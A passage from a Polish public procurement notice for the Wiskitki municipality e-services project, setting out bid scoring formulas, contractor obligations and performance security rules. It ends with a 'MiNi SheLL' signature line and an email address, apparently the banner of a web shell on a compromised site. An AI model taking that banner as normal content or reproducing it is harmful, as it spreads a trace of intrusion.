Cena utrzymania (utrzymania systemu w latach kolejnych włącznie z kosztami aktualizacji i hostingu) - o wadze 15 %,
Termin wdrożenia (liczony od momentu dokonania dostaw sprzętu i podpisania odbioru częściowego do momentu wdrożenia wszystkich wymaganych funkcjonalności i zgłoszenia wszystkich zadań do odbioru końcowego) - o wadze 15%

a sumę punktów, jaką zdobędzie badana oferta, stanowić będzie łączna ilość punktów przyznanych w ramach kryterium Cena Ofertowa i kryterium Cena Utrzymania i Termin Wdrożenia.
Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez WYKONAWCÓW w zakresie danego kryterium.
Oferta wypełniająca w najwyższym stopniu wymagania określonego kryterium otrzyma maksymalną ilość punktów. Pozostałym WYKONAWCOM, spełniającym wymagania kryterialne przypisane zostanie odpowiednio mniejsza liczba punktów.
Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana wg następujących zasad:
W zakresie kryterium oferta zostanie oceniona zgodnie z formułą: 

wg kryterium Cena Ofertowa:
WC = WCN/WCB*70 pkt.
gdzie:
WC  - 	Ilość punktów badanej oferty w kryterium cena ofertowa
WCN -	Cena oferty z najniższą ceną ofertową
WCB - 	Cena ofertowa  badanej oferty

wg kryterium Cena Utrzymania:
Wu = WUN/WUB*15 pkt.
gdzie:
WU  - 	Ilość punktów badanej oferty w kryterium cena utrzymania
WUN -	Cena oferty z najniższą ceną utrzymania
WUB - 	Cena utrzymania  badanej oferty
wg kryterium Termin Wdrożenia:
TW = TWN/TWB*15 pkt.
gdzie:
TW  - 	Ilość punktów badanej oferty w kryterium termin wdrożenia
TWN -	Termin wdrożenia oferty z najkrótszym czasem wdrożenia
TWB - 	Termin wdrożenia badanej oferty
Ocena końcowa punktowa będzie sumą punktów uzyskanych w poszczególnych kryteriach:
O = WC + WU  + TW
O - Ocena końcowa punktowa
Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska największą ilość punktów.

Wykonawca, którego oferta zostanie wybrana zobowiązany będzie:
Wnieść zabezpieczenie należytego wykonania umowy, nie później niż do dnia podpisania umowy.
Złożyć dokumenty potwierdzające, że osoby skierowane do realizacji zamówienia posiadają wymagane uprawnienia (certyfikaty).
W przypadku wyboru oferty Konsorcjum - należy dostarczyć umowę regulującą współpracę wykonawców w przedmiocie wykonywania zamówienia. W powiadomieniu o wyborze Wykonawcy podana zostanie data podpisania umowy. Wybrany Wykonawca lub osoby odpowiednio przez niego umocowane winny stawić się w siedzibie Zamawiającego we wskazanym terminie w celu podpisania umowy z dokumentem potwierdzającym spełnienie warunku zabezpieczenia należytego wykonania przedmiotu umowy.
O wynikach przetargu Wykonawcy zostaną powiadomieni przez umieszczenie wyników na tablicy ogłoszeń w siedzibie zamawiającego, indywidualnie elektronicznie, faksem lub listownie a także w formie elektronicznej na stronie zamawiającego.
Umowa pomiędzy Zamawiającym a wybranym Wykonawcą zostanie zawarta nie wcześniej niż po upływie 10 dni od dnia ogłoszenia wyniku postępowania. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem 10-dniowego terminu, jeżeli w postępowaniu została złożona tylko jedna oferta.

Ustala się zabezpieczenie należytego wykonania umowy w wysokości 10% ceny brutto podanej w ofercie.
Zabezpieczenie należy wnieść jednorazowo, przed podpisaniem umowy wyłącznie w jednej z form określonych w art. 148 ust. 1 ustawy Prawo zamówień publicznych.
Zabezpieczenie wniesione w formie poręczeń lub gwarancji musi zawierać zobowiązanie gwaranta lub poręczyciela do bezwarunkowej zapłaty zamawiającemu pełnej kwoty zabezpieczenia, na każde żądanie.
Część zabezpieczenia, stanowiąca 70% całości zabezpieczenia należytego wykonania umowy, zostanie zwrócona w terminie 30 dni od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane. Pozostała część, stanowiąca 30% całości zabezpieczenia należytego wykonania umowy, zostanie zwrócona nie później niż 15 dni po upływie okresu gwarancji.
Na wniosek wykonawcy, którego oferta zostanie uznana za najkorzystniejszą, wadium wniesione w pieniądzu wraz z odsetkami może być zaliczone przez zamawiającego na poczet zabezpieczenia należytego wykonania umowy.
W przypadku odstąpienia od umowy z przyczyn zależnych od wykonawcy, utraci on prawo do zwrotu zabezpieczenia należytego wykonania umowy, niezależnie od obowiązku zapłaty kar umownych.

Niniejsze zamówienie stanowi projekt p.n.: e- Usługi w Gminie Wiskitki na realizację którego Gmina Wiskitki ubiega się o uzyskanie dofinansowania z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com